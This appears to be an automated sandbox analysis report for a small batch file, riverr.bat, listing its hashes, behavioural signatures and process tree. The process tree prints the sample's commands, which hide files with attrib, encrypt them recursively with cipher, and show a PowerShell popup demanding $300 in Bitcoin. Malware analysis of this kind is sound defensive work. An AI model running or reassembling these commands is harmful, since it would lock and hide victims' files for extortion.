Analysis
- max time kernel: 126s
- max time network: 137s
- platform: windows10-1703_x64
- resource: win10-20230915-en
- resource tags: arch:x64, arch:x86, image:win10-20230915-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 06/10/2023, 15:43
Static task: static1
Behavioral task: behavioral1
- Sample: riverr.bat
- Resource: win10-20230915-en
General
- Target: riverr.bat
- Size: 1KB
- MD5: 6f925a40f06c74f1a6f89ca3cebb5448
- SHA1: a298915d2cfa3ba7178142e2d391bc1ab4978f7a
- SHA256: 19c3528c21b085b74d4f5d06f5665beb38d58ff9cd506153d8f158fa904b41ef
- SHA512: 07a85184c83df3aa4fe8abdcf0c9d2fafa020aaf61d54e5f6a8d11fddf10f715cb778c56112d53f9c46538c8441387d906c2b35fe7c6341deacfc85b3ecaeaee
Malware Config
Signatures
- Enumerates processes with tasklist (1 TTP, 1 IoC)
  pid 3364, tasklist.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid 3360, powershell.exe (3 events)
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, pid 3360, powershell.exe
  Token: SeDebugPrivilege, pid 3364, tasklist.exe
- Suspicious use of WriteProcessMemory (40 IoCs)
  PID 3748 (cmd.exe) wrote to memory of each child it spawned, every event recorded twice: target PIDs 340, 4460, 684, 1908, 4636, 4148, 1052, 4628, 3256, 5036, 68, 2508, 3940, 2424, 2680, 2400, 3360, 3364, 3952, 1480 (procid_target 71 to 89 and 91)
- Views/modifies file attributes (1 TTP, 8 IoCs)
  attrib.exe, pids 684, 4636, 1052, 3256, 68, 3940, 2680, 340
Processes
- Level 1: C:\Windows\system32\cmd.exe (PID 3748)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\riverr.bat"
  Signatures: Suspicious use of WriteProcessMemory
  Child processes (level 2, in launch order):
  - C:\Windows\system32\attrib.exe (PID 340): attrib +h /s /d
    Signatures: Views/modifies file attributes
  - C:\Windows\system32\cipher.exe (PID 4460): cipher /e /s /a
  - C:\Windows\system32\attrib.exe (PID 684): attrib +h /s /d
    Signatures: Views/modifies file attributes
  - C:\Windows\system32\cipher.exe (PID 1908): cipher /e /s /a
  - C:\Windows\system32\attrib.exe (PID 4636): attrib +h /s /d
    Signatures: Views/modifies file attributes
  - C:\Windows\system32\cipher.exe (PID 4148): cipher /e /s /a
  - C:\Windows\system32\attrib.exe (PID 1052): attrib +h /s /d
    Signatures: Views/modifies file attributes
  - C:\Windows\system32\cipher.exe (PID 4628): cipher /e /s /a
  - C:\Windows\system32\attrib.exe (PID 3256): attrib +h /s /d
    Signatures: Views/modifies file attributes
  - C:\Windows\system32\cipher.exe (PID 5036): cipher /e /s /a
  - C:\Windows\system32\attrib.exe (PID 68): attrib +h /s /d
    Signatures: Views/modifies file attributes
  - C:\Windows\system32\cipher.exe (PID 2508): cipher /e /s /a
  - C:\Windows\system32\attrib.exe (PID 3940): attrib +h /s /d
    Signatures: Views/modifies file attributes
  - C:\Windows\system32\cipher.exe (PID 2424): cipher /e /s /a
  - C:\Windows\system32\attrib.exe (PID 2680): attrib +h /s /d
    Signatures: Views/modifies file attributes
  - C:\Windows\system32\cipher.exe (PID 2400): cipher /e /s /a
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3360): powershell -command "$wshell = New-Object -ComObject WScript.Shell; $wshell.Popup('Your files have been encrypted! To get them back, pay $300 to the following Bitcoin address: 3BKuiDHNSbdCdK8fHTUxCB4GRBiuKUrMzr...', 0, 'Cap or Fact', 16)"
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\tasklist.exe (PID 3364): tasklist
    Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\find.exe (PID 3952): find /i "Ransomware"
  - C:\Windows\system32\notepad.exe (PID 1480): notepad "C:\Users\Admin\Downloads\do not close.txt"
Network
MITRE ATT&CK Enterprise v15
Downloads
- File 1
  Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
- File 2
  Filesize: 111B
  MD5: 31a135982c340ddee33732d381694b3c
  SHA1: 4b7a551ae6507f2ed1fd6601d35d9e36915fef3b
  SHA256: 71b2cc62a02aee920d4984caf0fdb26fc32b14190d3bac9b0f88fe696708449c
  SHA512: 82344bca5b4ed3eb5eacfb2c79ffc8f799db5daa10e5cb4b89675bca4f251fcd933dd4e2319d11b3456cee08102e5bf5ce0a878a6296fe548ef2ae148287dcf7